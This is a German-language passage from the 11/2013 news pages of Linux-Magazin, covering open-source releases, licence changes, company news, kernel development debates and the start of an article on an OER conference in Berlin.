NFS 4.2 und Labeled NFS mit
Zugriffskontrolle sowie für
das Lustre-Dateisystem. n
Arcavias Core 2013.09 mit mehr Shopping-Komfort
Das Hamburger Unternehmen
Metaways hat sein freies E-
Commerce-Framework Arcavias
in Version 2013.09 freigegeben.
Die neue Release des
Kerns, zur Unterscheidung
von der passenden Typo-3-
Erweiterung Arcavias Core
genannt, bringt den Shopbesuchern
einige neue Komfortfunktionen.
Sie können
sich in der Detailansicht nun
Produktvarianten wie etwa
unterschiedliche Farben und
Größen ansehen. Veränderungen
bei Preisen oder der Verfügbarkeit
der Produkte hebt
die Weboberfläche hervor.
Daneben merkt sich das System
bei der Bestellung eingegebene
Lieferadressen in den
Kundeninformationen.
Shopbetreiber können im Warenkorb
nun Obergrenzen für
Bestellmengen und den Wert
einrichten und die dem Kunden
angebotenen Zahlungsarten
steuern. Beispielsweise
lässt sich das Lastschriftverfahren
erst dann freigeben,
wenn der Kunde einige vorhergehende
Bestellungen bezahlt
hat. Dazu kommen auf
der Admin-Oberfläche verschiedene
Text- und Medienarten,
im Code gibt es einen
Controller für Cronjobs.
Auf der Webseite [http://​www.​
​arcavias.​com] warten weitere
Informationen. Zudem steht
dort die PHP-Software als
Tarball zum Download bereit,
lizenziert ist sie unter der
LGPLv3. (kki/mhu) n

Aktuell
www.linux-magazin.de Zahlen & Trends 11/2013
12
Zahlen & Trends
Bessere OOXML-Unterstützung für Libre Office 4.2 angekündigt
Die Veröffentlichung von
Libre Office 4.2 steht noch
lange nicht ins Haus, aber
Miklos Vajna, Libre-Office-
Entwickler bei Suse, hat in
einem Blogbeitrag bereits
erste Neuerungen vorgestellt.
Diese betreffen die Kompatibilität
von Dokumenten in
Microsofts DOCX-Format mit
Libre Office Writer. Die Dokumente
lassen sich noch immer
nicht problemlos und originalgetreu
in Libre Office öffnen,
sobald sie aufwändigere Layouts
mitbringen. Auch der Export
solcher Dokument klappt
noch nicht fehlerfrei.
Für frei schwebende Tabellen
demonstriert Vajna in seinem
Blog [http://​vmiklos.​hu/​blog/]
nun deutliche Verbesserungen.
Dazu zeigt er Screenshots
des Originaldokuments
in Microsoft Word 2007 und
dann das Importergebnis in
der aktuellen sowie in der
Vorabversion von Libre Office
4.2. Letztere stellt Floating
Tables deutlich ansehnlicher
dar, ohne aber das Layout zu
zerstören. Auch der Export
solcher Tabellen funktioniert
besser: Nach einem Roundtrip,
also dem Öffnen und
Schließen des Dokuments
in verschiedenen Office-Programmen,
bleibt das Layout
dennoch intakt. In einem weiteren
Bildvergleich demonstriert
Vajna, dass auch der Import
und Export schattierter
Absätze gelingt.
Der Entwickler bittet dann
darum, die neuen Features
zu testen und Bugreports zu
verfassen und weist darauf
hin, dass wohl noch weitere
interessante Features in Libre
Office 4.2 landen werden, das
in der letzten Januarwoche
2014 erscheinen soll. n
Bilder-Quelle: http://vmiklos.hu/blog/
Frei schwebende Tabellen in Microsoft Word 2007 ... ... und die Darstellung in der Entwicklerversion von Libre Office 4.2.
Red Hat verstärkt Open-MP-Board
Die amerikanische Softwareschmiede
Red Hat ist neuerdings
Mitglied des Open MP
Architecture Review Board
(ARB), das für die Multiprocessing-Fähigkeiten
neuer
Hardware die entsprechende
Software standardisieren
möchte. Die Aufgabe des
Board besteht darin, den Standard
für das Multiprocessing-
API (C/​C++ und Fortran) voranzutreiben.
Open MP hilft
Programme über Compiler-Direktiven
und Bibliotheksroutinen
tauglich für den Einsatz
auf Multiprozessor-Systemen
zu machen.
„Als ein gewichtiger Verfechter
von Open MP fühlt sich
Red Hat geehrt, dem Open MP
ARB beizutreten“, schreibt
Mike Werner, Senior Director
für ISV und Developer Ecosystems
bei Red Hat. Die Firma
hat den Standard unter anderem
in ihr aktuelles Hauptprodukt
Red Hat Enterprise Linux
integriert, das in Version 6.4
auf dem Markt ist.
Auch Michael Wong, CEO von
Open MP, gibt sich erfreut.
Red Hat unterstütze Open
MP bereits länger mit eigenen
GCC-Implementierungen und
sei stark an offenen Standards
interessiert, beschreibt er das
neue Mitglied. Red Hat gehört
nun zu den 14 permanenten
Mitgliedern im ARB. n

Suse-Studie sieht Linux weiter auf dem Vormarsch
Nicht zuletzt weil Anwender
und Entscheider endlich die
„irrationalen Ängste“ ablegen
würden, sei Linux im Servermarkt
weiter auf dem Vormarsch,
behauptet eine Studie,
die der Distributor Suse
erstellen ließ.
Laut der Untersuchung verwenden
heute vier von fünf
Unternehmen Linux, fast
die Hälfte davon setze es
als Hauptbetriebssystem auf
den Firmenservern ein. Jedes
siebte Unternehmen nutze
Linux auf einem Webserver,
aber mehr als 75 Prozent wollen
binnen Jahresfrist einen
Lamp-Server integrieren.
Auf Platz 1 der Liste mit
Mi gra tionsgründen stehen
Themen wie Sicherheit, die
niedrigen TCO (Total Cost
of Ownership), die Hochverfügbarkeit,
aber auch die
Option, den Vendor-Lock-in
eines Herstellers zu vermeiden.
Die Unterstützung durch
eine Community landet in der
Umfrage hingegen auf dem
letzten Platz.
Und auch das sagt die Studie:
Wenn Firmen, die noch Unix
verwenden, mit einer Linux-
Migration zögern, geben sie
als Hauptgründe den Mangel
an Vendor-Support, Knowhow
und Sicherheit an. n
Eine Studie von Suse sieht Linux-Server auf dem Vormarsch.
Zahlen & Trends 11/2013
Aktuell
www.linux-magazin.de
13
Collabora leistet Libre-Office-Support
Neuer Evergreen
Kubuntu-Support
Ein neuer Geschäftsbereich
des international tätigen IT-
Dienstleisters Collabora macht
sich das Geschäft mit Support
sowie anderen Leistungen
rund um Libre Office zur Aufgabe.
Die neue Division heißt
Collabora Productivity und
verfügt nach eigenen Angaben
weltweit über die meisten
von der Document Foundation
zertifizierten Entwickler
für die freie Bürosuite.
Vice President von Productivity
ist das Office-Urgestein
Michael Meeks, vorher bei
Suse tätig. Er sieht in vielen
Unternehmen einen Trend zur
Libre-Office-Migration, die Lizenzkosten
einspare, ohne zu
Lasten der Produktivität zu
gehen.
Collabora hat für seine Libre-
Office-Dienstleistungen die
Seite [http://​www.​collabora.​com/​
​projects/​libreoffice] eingerichtet.
Auf ihr warten bereits
mehrere Angebote, darunter
Hilfe bei der Libre-Office-
Einführung, Level-3-Support,
Longterm-Support sowie Unterstützung
für heterogene
Umgebungen mit Windows,
Mac und Linux. Daneben
bietet das Unternehmen auch
maßgeschneiderte Beratung
und Entwicklung an, sei es
die Konvertierung von Dokumenten
oder die Anpassung
für bestimmte Geräte.
Suse, bereits seit Jahren Anbieter
von Libre-Office-Subskriptionen,
tut sich mit Collabora
als Partner zusammen.
Neue Kunden sowie jene, die
ihre Subskription verlängern,
können sich optional für
Support durch Collabora entscheiden,
langfristig soll der
Support auf den Dienstleister
übergehen. Laut Suse-CEO
Nils Brauckmann möchte sich
das Linux-Unternehmen stärker
auf sein Betriebssystem
und die Cloud-Infrastruktur
konzentrieren.
n
Die kommende Release 13.1
von Open Suse soll ein Evergreen
werden und damit über
die üblichen 18 Monaten hinaus
Stabilitäts- und Security-
Updates erhalten. Das hat das
Evergreen-Team der Distribution
mitgeteilt. Planmäßig will
man Version 13.1 mindestens
drei Jahre lang erhalten und
pflegen. Das heißt konkret,
Open Suse 13.1 soll im November
2013 erscheinen und
wird bis November 2016 mit
Patches und Sicherheitsupdates
versorgt.
Das von Suse unabhängig
agierende Evergreen-Team,
das Wolfgang Rosenauer ins
Leben rief, versorgt derzeit
die Open-Suse-Releases 11.2
und 11.4 mit verlängertem
Support bis zum November
2013 respektive 2014. Weitere
Informationen über Evergreen
liefert eine Seite im Open-
Suse-Wiki [http://​en.​opensuse.​
​org/​openSUSE:Evergreen]. n
Für die Linux-Distribution
Kubuntu gibt es ab sofort
kommerziellen Support. Das
gab das Projekt in der Ankündigung
[http://​www.​kubuntu.​org/​
​news/​commercial‐support] bekannt.
Die gebührenpflichtige
Unterstützung realisieren die
Entwickler um den Schotten
Jonathan Riddell über ihre
Partner Emerge Open und
With Support, die in England
ansässig sind.
Im Angebot sind eine Unterstützung
per Telefon, Mail,
Skype, Remote-Desktop sowie
über weitere Kanäle nach
Kundenwunsch. Ein Stunde
kostet zirka 95 Euro, ein Acht-
Stunden-Tag rund 590 Euro.
Daneben sind auch monatliche
Supportverträge sowie
Service Level Agreements
(SLA) erhältlich. Der aus
dem kommerziellen Support
gewonnene Profit soll wieder
zurück an das Kubuntu-Projekt
fließen.
n

Aktuell
www.linux-magazin.de Zahlen & Trends 11/2013
14
Blenders Renderengine Cycles wechselt zur Apache-2.0-Lizenz
Die Blender Foundation hat
die Lizenz ihrer Renderengine
Cycles von der GPL in die
Apache-2.0-Lizenz verändert,
die keine Copyleft-Klausel
enthält. Die Nutzer können
den Quellcode also nutzen,
ohne den veränderten Code
zurückgeben zu müssen. Dadurch
lässt sich die Software
in eher restriktiven proprietären
Umgebungen einsetzen,
etwa als In-House-Software in
Studios.
Unabhängig von diesem
Schritt werde das Blender-
Projekt aber auch weiterhin
selbst an der Engine arbeiten,
schreiben Cycles-Entwickler
Brecht van Lommel und Ton
Roosendall von der Blender
Foundation. Sie begründen
den Schritt mit der Hoffnung,
die Raytracing-Engine werde
durch einen Einsatz in kommerziellen
Umgebungen mehr
Unterstützer finden.
Blender unterwerfe sich weiterhin
der GPL, für Bibliotheken
habe es sich aber in
der Vergangenheit als Vorteil
erwiesen, sie unter einer BSDoder
Apache-Lizenz zu veröffentlichen.
Letztere bot sich
Quelle: emirage.org
an, weil schon andere Teile
der Engine unter dieser Lizenz
stünden, aber auch Open Subdiv,
das die Entwickler in die
Renderengine Cycles integrieren
möchten.
n
Blenders Renderengine Cycles kann beeindruckende Grafiken erzeugen.
LSK: Linaro will Longterm-Support-Kernel
Das Linaro-Projekt, das an
besserer Linux-Unterstüt zung
für die ARM-Architektur arbeitet,
will künftig eine eigene
stabile Kernelversion pfle gen.
Das schreibt Mark Brown, seit
Kurzem Linaro-Mitarbeiter
und technischer Leiter des Linaro
Stable Kernel (LSK), in
einem Blogeintrag.
Die kommende Linaro-Release
13.09 soll erstmals einen solchen
stabilen Kernel anbieten.
Eine Betaversion des
LSK gab es zudem bereits für
das jüngste Linaro 13.08. Der
LSK soll auf dem Upstream-
Kernel 3.10 beruhen und für
die Linaro-Teilnehmer wichtige
Funktionen integrieren.
Sie sollen von neuen ARM-
Features profitieren und die
Stabilität und Qualität eines
LTS-Kernel erhalten.
Eine eigene Wiki-Seite [https://​
​wiki.​linaro.​org/​LSK] zum stabilen
Linaro-Kernel bietet Interessierten
weitere Informationen
an. Der Kernel wird in zwei
Ausgaben mit den Bezeichnungen
Core und Android zur
Verfügung stehen. n
Investigative Webseite Groklaw macht dicht
Die amerikanische Website
Groklaw.net hat die Open-
Source-Community rund zehn
Jahre lang in juristischen Fragen
begleitet. Nun stellte sie
ihre Arbeit ein. Pamela Jones,
juristische Assistentin und
Groklaw-Gründerin, legte
in ihrem vermutlich letzten
Blogeintrag die Gründe dar:
In einem Klima der Überwachung,
wie es das Internet-
Monitoring der amerikanischen
Geheimdienste erzeuge,
sehe sie keine Möglichkeit,
ihre Arbeit weiterzuführen.
Ohne die Vertraulichkeit von
Mails könne sie nicht mit Informanten
und Mitarbeitern
kommunizieren, lautet ihre
verbitterte Schlussfolgerung.
Den Verlust der Vertraulichkeit
und Privatsphäre verglich
sie mit einem Einbruch in ihre
Wohnung, den sie vor Jahren
erlebt hatte.
Mit Groklaw schließt eine
verdienstvolle Seite, die insbesondere
die SCO-Klagewelle
gegen Linux-Distributoren
und ‐Anwender kritisch begleitet
hat. Daneben waren
Patente, die Anerkennung von
Microsofts OOXML-Format als
Standard sowie allgemein Urheberrecht
und Lizenzen die
Themen der veröffentlichten
Artikel und geführten Diskussionen.
Für seine Arbeit erhielt das
Projekt im Jahre 2010 die EFF
Pioneer Awards sowie im Jahr
2008 eine ehrende Erwähnung
beim Prix Ars Electronica
und den Award for Projects
of Social Benefit von der Free
Software Foundation (FSF).
Die Library of Congress hat
Groklaw sogar in seine Sammlung
von historisch wertvollen
Internetmaterialien aufgenommen.
Georg Greve, ehemaliger
Präsident der Free Software
Foundation Europe (FSFE)
und nun CEO von Kolab Systems,
kommentiert das Ende
des Internetprojekts in seinem
Blogeintrag [http://​blogs.​fsfe.​org/​
​greve/​?​p=625]. Darin zitiert er
seinen Kollegen Paul Adams
aus dem Kolab-IRC-Channel:
„Ohne Groklaw ist die IT-Welt
ein Stück weniger sicher.“ n

Gnome-Erleuchtung ohne Google
Der Webbrowser des Gnome-
Desktops, Epiphany, wird in
Zukunft Duck Duck Go statt
Google als Standard-Suchmaschine
verwenden. Grund
dafür seien die Anstrengungen
des Gnome-Projekts, die
Privatsphäre der Gnome-Anwender
besser zu schützen,
schreibt Claudio Saavedra, einer
der Maintainer, in einem
Blogeintrag.
Im Unterschied zu Google
sammle [https://​duckduckgo.​
​com] keine Daten über das
Benutzerverhalten. Zudem
sei die kleine Suchmaschine
alltagstauglich und biete zahlreiche
Keywords für spezialisierte
Suchen an, etwa in der
Wikipedia. Im Gegenzug erhält
das Gnome-Projekt über
Saavedras Arbeitgeber Igalia
einen Anteil an den – bescheidenen
– Einnahmen von Duck
Duck Go.
Die Änderung wird erstmals
in Gnome 3.10 auftauchen,
das laut Release-Plan Ende
September erscheinen soll.
Die Partnerschaft soll vorerst
für einen beschränkten Zeitraum
gelten, danach werde
sie erneut evaluiert. Für Anwender,
die bereits eine Suchmaschine
in Epiphany konfiguriert
haben, werde sich
nichts ändern, versichern die
Entwickler. Daneben könne
der Benutzer auch weiterhin
eine Suchmaschine seiner
Wahl einstellen.
n
Neuseeland schafft Softwarepatente ab
Mit 117 gegen vier Stimmen
votierte Neuseelands Parlament
für eine Änderung des
Patentgesetzes, die Softwarepatente
abschafft. Fünf Jahre
lang hatten die Neuseeländer
das Thema debattiert. Im
neuen Paragraphen 10A des
Patentgesetzes steht, dass ein
Computerprogramm keine Erfindung
sei.
Ähnlich wie in der EU lassen
sich Programme in Neuseeland
künftig nur dann schützen,
wenn sie zum Beispiel
Prozesse implementieren, um
eine patentierte Technologie
zu verbessern. Ein Prozess
wäre also patentierbar, wenn
er die geschützte Waschmethode
in einer Waschmaschine
effizienter umsetzt.
Laut Ars Technica gibt es
vielleicht einen gewollten Nebeneffekt:
Indem Neuseeland
Computerprogramme nicht
mehr als Erfindungen bezeichnet,
fallen sie auch nicht
unter das internationale Trips
Agreement (Trade-Related Aspects
of Intellectual Property
Rights) der WTO.
Paul Matthews, Geschäftsführer
des Instituts für IT-
Professionals in Neuseeland,
begrüßte die Entwicklung.
Patenttrolle seien nämlich ein
Problem, kaum noch lasse
sich aktuell eine Software
entwickeln, ohne eines der
zahlreichen Trivialpatente zu
verletzen. Allerdings wirke
die Änderung nicht rückwirkend,
sondern betreffe nur
neu erstellte Anwendungen.
Und noch sei das Gesetz nicht
komplett durch das Parlament
gegangen, was aber bald der
Fall sein werde. Wie aber die
Rechtsprechung die Gesetze
in der Praxis auslegt, muss
sich noch zeigen. n

Aktuell
www.linux-magazin.de Zahlen & Trends 11/2013
16
VMware feiert sich und die Zukunft
Wer die grellen Auftritte von
Steve Jobs oder Steve Ballmer
auf übergroßer Bühne vor einem
enthusiasmierten Publikum
kennt und schätzt, war
Pat Gelsinger ist der CEO von VMware.
Ende August auf VMwares
zehnter Hausmesse, der VMworld
[http://​www.​vmworld.​com]
in San Francisco, richtig.
Begleitet von einer Lasershow,
zeichnete CEO Pat Gelsinger
anlässlich des 15. Geburtstags
von VMware dessen Zukunft
in hoffnungsfrohen Farben.
Das als „Keynote“ zu neutral
angekündigte Tamtam ist
nachvollziehbar, weil das seit
2003 größtenteils zu EMC gehörende
Virtualisierungs- und
Cloud-Unternehmen im Jahr
2012 4,6 Milliarden US-Dollar
mit Hilfe einer halben Million
Kunden erlöste – Tendenz
steigend.
Workstation, das erste relevante
VMware-Produkt im
Jahre 1999, verhalf Linux
erstmals zu einer Vollvirtualisierung,
2001 schwenkten die
Kalifornier mit dem ESX Server
eher in Richtung Bare Metal.
Als 2008 der Ex-Microsoft-
Manager Paul Maritz das Ruder
übernahm, kamen Bedenken
auf, dass sich VMware in
Richtung Red mond ausrichten
könnte. Die bewahrheiteten
sich in der Folge allerdings
nicht. Vielmehr wird Maritz
das Bonmot zugeschrieben,
in seiner Position bei VMware
könne er nun die technischen
Fehler beheben, die er selbst
mit Windows in den Markt
gebracht habe.
VMware kündigte nun die
nächsten Schritte ins vor einem
Jahr projektierte „Software-Defined
Datacenter“
(SDDC) an: VMware NSX
(ein virtuelles Layer-2-bis-7-
Netzwerk, das im Wesentlichen
aus der Nicira Virtualization
Platform und V-Cloud
Networking und Security
besteht), Virtual SAN (dynamische
Storages für VMs), V-
Cloud Suite 5.5 (um App-HA
und Flashspeicher-Optimierung
erweitertes V-Sphere)
und schließlich V-Sphere mit
Operation Management. n
Tupi: Freies Animationsprogramm sucht Unterstützung
Die Macher des freien 2-D-
Animationsprogramms Tupi
wollen auf Kickstarter 30 000
US-Dollar sammeln. Mit dem
Geld wollen sie Tupi [http://​
​maefloresta.​com/​portal/] um
neue Funktionen erweitern
und Version 1.0 erreichen.
Konkret planen die Entwickler
mehrere Zeichenwerkzeuge
zu überarbeiten und ihre Bedienung
zu vereinfachen. Neu
hinzukommen sollen neben
einem Farbverlaufswerkzeug
auch Sound-, Kamera- und
Maskierungs-Layer. Mit der
Kampagne möchte das Projekt
zudem neue Grafiker und Entwickler
gewinnen.
Tupi ist ein Fork des mittlerweile
eingestellten Ktoon-
Projekts, basiert auf dem Qt-
Toolkit, steht unter der GPLv3
und will neben Anfängern
auch professionelle Zeichner
ansprechen. Installationsfertige
Pakete gibt es derzeit nur
für Ubuntu und OS X. Hat die
Kickstarter-Kampagne Erfolg,
wollen die Entwickler auch
ein Installationspaket für
Windows schnüren. n
Ubuntu Touch 13.10 mit eigenem Audiostack
Bisher nutzte Ubuntu Touch
noch den Audio Flinger von
Android fürs Abspielen und
Aufnehmen von Sounds. Im
aktuellen Image kümmern
sich hingegen Pulseaudio und
Alsa um den guten Ton. Der
neue Audiostack für Ubuntu
Touch sei noch in der Anfangsphase
und laufe am besten
auf dem Nexus 4, schreibt
Ubuntu-Entwickler David
Henningsson. Bis auf einen
relevanten Bug sei die Arbeit
für das Galaxy Nexus vorangeschritten,
Nexus-7-Support
soll folgen, für das Nexus 10
suche er noch Tester.
In dem neuen Modell redet
Pulseaudio direkt mit Alsa
und – wenn nötig – mit dem
Audio Hardware Abstraction
Layer (HAL) von Android.
Letzteres gelte für das Starten
und Beenden von Anrufen,
weil Androids Audio-HAL zunächst
mit dem Modem und
weiteren Kernelkomponenten
kommuniziere, um den Anruf
vom Modem an die Soundkarte
zu leiten.
Beim gewöhnlichen Abspielen
und Aufnehmen von Audio-
Inhalten rede Pulseaudio hingegen
mit der Alsa-Bibliothek.
Über das Switch-Interface des
Kernels bekomme Pulseaudio
auch Wind davon, wenn der
Anwender Kopfhörer oder
Headsets in das Smartphone
oder Tablet stöpselt. Für die
Konfiguration von Mixern
kämen hingegen die Mixerdateien
von Alsa UCM zum
Einsatz.
In Henningssons Ankündigung
finden auch Portierer
erste Informationen. Der
Prozess sei noch etwas umständlich,
gibt der Entwickler
zu, verweist aber auf ein paar
Dateien mit Beispielcode zum
Thema. Er habe bisher lediglich
die von Ubuntu Touch offiziell
unterstützten Zielplattformen
getestet.
n

Saragossa: Von Open Suse auf Ubuntu
Nicht nur die Stadt München
setzt in der Verwaltung Linux
ein, auch spanische Städte
vertrauen seit ein paar Jahren
dem freien Betriebssystem in
der Verwaltung und im Bildungssektor.
Wie Join-up unter
[https://​joinup.​ec.​europa.​eu]
berichtet, hat die nordspanische
Stadt Saragossa nun im
Laufe des Sommers im Stadtrat
erste Linux-Rechner von
AZ-Linux 2 auf AZ-Linux 12
umgestellt.
Was zunächst nach einem
Versionswechsel klingt, ist zugleich
ein Distributionswechsel:
Während AZ-Linux 2 auf
Open Suse 11.2 basiert, fußt
AZ-Linux 12 auf Ubuntu 12.04
LTS. Für Eduardo Romero,
den IT-Spezialisten, der in Saragossa
die Desktop-Migration
betreut, war der Longterm-
Support von Ubuntu der ausschlaggebende
Grund für die
Umstellung. Open Suse bietet
zwar Evergreen-Versionen an,
welche die Patch-Versorgung
einiger Open-Suse-Versionen
über die Laufzeit hinaus verlängern,
diese erhalten aber
keinen offiziellen Support von
Suse.
Zurzeit läuft ein Viertel der
Rechner in Saragossas Stadtrat
auf Linux, insgesamt 800
von 3200 Computern. Eine
Testgruppe von 80 Rechnern
hat die Romero-Truppe nun
auf AZ-Linux 12 umgestellt,
die restlichen 720 sollen in
den nächsten Monaten folgen.
Bald wollen sie jene PCs umstellen,
auf denen „noch das
ein Jahrzehnt alte proprietäre
Betriebssystem“ laufe.
Saragossa setze seit 2005
zunehmend freie Software
ein, berichtet Romero. Zunächst
wurden der Browser
Firefox und der Mailclient
Thunderbird sowie der Multimedia-Player
VLC auf sämtlichen
3200 PCs installiert. 2007
kam dann Open Office hinzu,
das kürzlich durch Libre Office
ersetzt wurde, das auf
allen PCs der Stadt läuft. Daneben
nutzt Saragossa auch
Gimp (Grafikbearbeitung),
Inkscape (Grafikerzeugung),
Pdfsam (PDF-Editor), Brasero
(zum Brennen von CDs),
Kdenlive (Videoschnitt) sowie
Evince zum Anzeigen von
PDFs. (jk/kki/mfe/mhu/Tim
Schürmann) n
Das offizielle Wappen der spanischen
680 000-Einwohner-Stadt Saragossa.
heralder, CC-BY-SA 3.0
Zahlen & Trends 11/2013
Aktuell
www.linux-magazin.de
17
Anzeige

Aktuell
www.linux-magazin.de Kernel-News 11/2013
18
Zacks Kernel-News
Wann ist ein Patch reif für den stabilen Kernel?
Kaum hatte Greg Kroah-Hartman den stabilen Kernel 3.0.92 veröffentlicht,
schon fand sich darin ein Bug. Eine Wartefrist soll das künftig verhindern.
Der Amerikaner Greg Kroah-
Hartman, Maintainer der stabilen
Linux-Kernel, möchte
künftig länger warten, bevor
er ein Patch annimmt. Schon
bisher musste eine Änderung
für den Stable-Zweig zuerst in
den Kernel von Linus Torvalds
wandern, damit sich die beiden
nicht zu weit von einander
entfernen. An diesem
Vorgehen gab es in letzter Zeit
Kritik, weil es die Aufnahme
selbst einfacher Bugfixes in
den stabilen Linux-Kern verzögerte.
Dennoch ist Greg kürzlich
ein fehlerhaftes Stück Code
in den Kernel gerutscht: Das
Patch sollte eine Race Condition
in Netlink-Code beheben.
Es war zuvor ordnungsgemäß
im Torvaldsschen Zweig gelandet.
Offensichtlich hatte
es aber nicht genug Tests
durchgemacht und enthielt
einen handfesten Bug. Greg
bemerkte das erst, nachdem
er die stabile Version 3.0.92
veröffentlicht hatte.
Aus diesem Anlass schlägt
Linus vor, Änderungen an
Mainline sollten nicht sofort
in Stable eingehen, sondern
nach einer kleinen Wartezeit –
„nach einer Woche oder so“,
meint der Kernel-Chef. Greg
beschloss also, auf den jeweils
nächsten Release Candidate
des Mainline-Kernels zu
warten, bevor er die Patches
übernimmt.
Unter bestimmten Voraussetzungen
will er sich aber nicht
so viel Zeit lassen, beispielsweise
wenn der Subsystem-
Maintainer zustimmt oder es
persönlich einschickt. Auch
ausführliche Diskussionen auf
der Mailingliste oder ausgiebige
Tests eines Patches sollen
es für Stable qualifizieren. Mit
trivialen Änderungen möchte
Greg auch nicht warten.
Willy Tarreau, der selbst Erfahrung
mit der Betreuung
stabiler Kernel hat, würde
gerne noch weiter gehen. Er
rät, nicht nur auf den nächsten
Release Candidate zu warten,
sondern auf den nächsten
»‐rc1«, den Linus erst nach
einem kompletten Entwicklungszyklus
veröffentlicht.
Greg widerspricht: „Drei Monate
warten ist meiner Meinung
noch zu lange, tut mir
Leid.“
Josh Boyer vom Fedora-Projekt
möchte dagegen sogar auf
»‐rc2« warten. Kroah-Hartman
darauf: „Ein Maintainer kann
seine Patches einfach so taggen,
dass ich bis »‐rc2« warte.
Es kommt aber ohnehin mit
»‐rc1« ein so riesige Menge an
Patches auf mich zu, dass ich
sie vor »‐rc2« gar nicht abarbeiten
kann.“
Josh bietet an, Fehler, die ihm
bei seiner Arbeit mit Fedoras
Entwicklerversion Rawhide
begegnen, rasch an Greg zu
melden. Daneben will er eine
Liste von Patches anlegen, die
zwar seine Distribution enthält,
Stable aber nicht. Das
trifft auf Gregs Wohlwollen,
„Ich bitte schon lange die Distributionen
um ihre Patches,
denn die gibt es bestimmt aus
guten Gründen.“
Daneben diskutierte die Liste
die geeignete Wartefrist für
die Aufnahme in den stabilen
Kernel. Steven Rostedt rät
dazu, Statistiken aufzustellen,
wie lange es dauert, bis ein
Defekt in einem Patch für Stable
entdeckt wird. „Wir sollten
die Daten der Vergangenheit
nutzen, um eine geeignete
Heuristik aufzustellen.“
Zudem empfiehlt er, ein Patch
solle erst eine Weile im Zweig
»linux‐next« heranreifen, dann
in Mainline kommen, dort
weiter reifen und erst dann in
Stable gelangen.
Als ein weiteres Mal »‐rc2« auf
den Tisch kam, schaltete sich
Linus Torvalds ein: „Ich glaube,
die »‐rc«-Versionen sind
gar nicht so wichtig. Entscheidend
ist es, überhaupt zu warten,
und nicht unbedingt auf
einen Release Candidate.“ Es
kommt ihm darauf an, dass
ein Patch mindestens eine
Woche lang im Git-Repository
bleibt, damit Entwickler und
interessierte Anwender es testen
können.
Mit dieser Maßgabe ließen
sich zwar nicht alle Bugs
finden, aber die meisten, beschließt
Torvalds seinen Beitrag.
Dem folgte eine Diskussion
unter den Entwicklern,
wie oft man einen Snapshot
aus dem Mainline-Repository
holen und testen sollte. Borislav
Petkov beispielsweise holt
sich wöchentlich den Code ab
und lässt ihn bis zum nächsten
Snapshot laufen. Tony
Luck macht sich dafür stark,
gelegentlich Momentaufnahmen
eines Tages zu benutzen,
ansonsten würden die Patches
eine ganze Woche lang ungeprüft
herumliegen. Insgesamt
sieht es so aus, als würde
Greg seinen ursprünglichen
Plan umsetzen – beziehungsweise
den von Linus. n

Mehr Ordnung für den Device Tree
Der Embedded-Entwickler
Grant Likely fordert mehr
Maintainer für die Bindings
des Device Tree. Der Device
Tree ist eine Datenstruktur,
die Hardware-Details eines
Computers beschreibt und die
der Linux-Kernel mittels der
Bindings lesen kann.
Grant, derzeit Maintainer der
Datenstruktur, schreibt: „Weder
Rob [Herring, Co-Maintainer]
noch ich bewältigen
die Arbeitslast, zudem gibt es
viele schlecht gemachte Bindings.“
Er hat bereits ein Patch
geschickt, das mehr Entwickler
als Co-Maintainer auflistet.
Daneben bittet er alle Interessierten
um Mithilfe.
Außerdem bringt er das Thema
der Schema-Validierung
zur Sprache. Jedes Binding
folgt einem Standardformat –
oder sollte ihm folgen –, doch
derzeit wird das nirgends geprüft.
Laut Grant wird sich
künftig aber der Samsung-
Mitarbeiter Tomasz Figa darum
kümmern. Ungültige
Schemata soll der Compile-
Vorgang bemängeln.
Grant beklagt, dass es derzeit
keinen geregelten Entwicklungsprozess
gibt, sondern
nur hektische Betriebsamkeit.
Es gäbe einige ungelöste
Fragen: Soll der Device Tree
einen Unterschied zwischen
stabilen Bindings und solchen
im Staging-Zweig machen?
Wie kommen neue Bindings
in den Kernel – über einzelne
Subsysteme oder nur zentralisiert
über den Device Tree?
Tomasz argumentiert, sobald
Bindings als stabil gelten, sollte
man sie als Teil des Kernel-
ABI ansehen. Damit dürften
weitere Änderungen niemals
die Rückwärtskompatibilität
brechen.
Alison Chaiken von Mentor
Graphics macht sich Gedanken
über die Art der Validierung.
Sie fragt: „Da Device-
Tree-Quelltext ein wenig wie
XML (oder vielleicht eher
Json) aussieht, werden die
Schemata so ähnlich funktionieren
wie DTDs, gegen die
man validieren kann? Oder
muss ich mir das eher wie einen
Compiler, etwa GCC, vorstellen?“
Tomasz setzt auf die
zweite Alternative und möchte
die Prüfung im Device-Tree-
Compiler »dtc« umsetzen,
XML halten die Entwickler für
überflüssig.
Grant beschreibt detailliert,
wie er sich das Schema für
Device-Tree-Bindings vorstellt.
Ihm geht es nicht nur um die
Validierung, sondern auch um
eine neue Art, die Bindings
zu notieren. Sein Vorschlag ist
unter [https://​lkml.​org/​lkml/​2013/​
​7/​25/​8] nachzulesen. (Zack
Brown/​mhu)
n
Kernel-News 11/2013
Aktuell
www.linux-magazin.de
19

Aktuell
www.linux-magazin.de OER-Konferenz 2013 11/2013
20
Konferenz um freies Wissen
Wissen teilen
Seit 2002 gibt es den von der Unesco geprägten Begriff Open Educational Resources (OER). In Deutschland
tauschten sich verschiedene OER-Akteure nun erstmals auf einer großen Konferenz aus. Kristian Kißling
In Berlin trafen sich verschiedene OER-Akteure im Rahmen einer Konferenz.
Zu den Open Educational
Resources zählen nicht nur
freie Bildungsmaterialien unter
offenen Lizenzen, etwa Arbeitsblätter
oder Lehrbücher,
die an Schulen und Universitäten
zum Einsatz kommen.
Auch zeitgenössische Lernkonzepte,
die das Web und
die neue Form von Wissensgesellschaft
mitdenken, etwa
Onlineseminare und Lernplattformen,
gehören dazu.
Die erste große OER-Konferenz
[1] in Deutschland, die
am 14. und 15. September
2013 in Berlin stattfand, vernetzte
nun jene Akteure, die
sich mit freien Inhalten beschäftigen:
politische Akteure,
Lernforscher, Lehrer, aber
auch Schulbuchverleger und
Softwareentwickler.
Das Interesse war groß: Über
300 Teilnehmer diskutierten
in Workshops und selbst organisierten
Barcamps das
Thema OER. Oft arbeiten sie,
das kristallisierte sich schnell
heraus, eher neben- als miteinander.
Die Resonanz sei „umwerfend“,
schwärmt Catrin
Schoneville, Pressesprecherin
bei Wikimedia Deutschland.
Die Organisation hat die Veranstaltung,
die unter Schirmherrschaft
der Unesco steht,
finanziert und wurde von einigen
Partnern unterstützt.
Erste OERientierung
Während das Thema OER in
Deutschland noch in den Kinderschuhen
steckt, schießen
in den USA die MOOCs (Massive
Open Online Course)
wie Pilze aus dem Boden:
Class2Go, Coursera, Ed X und
einige mehr bieten kostenlose
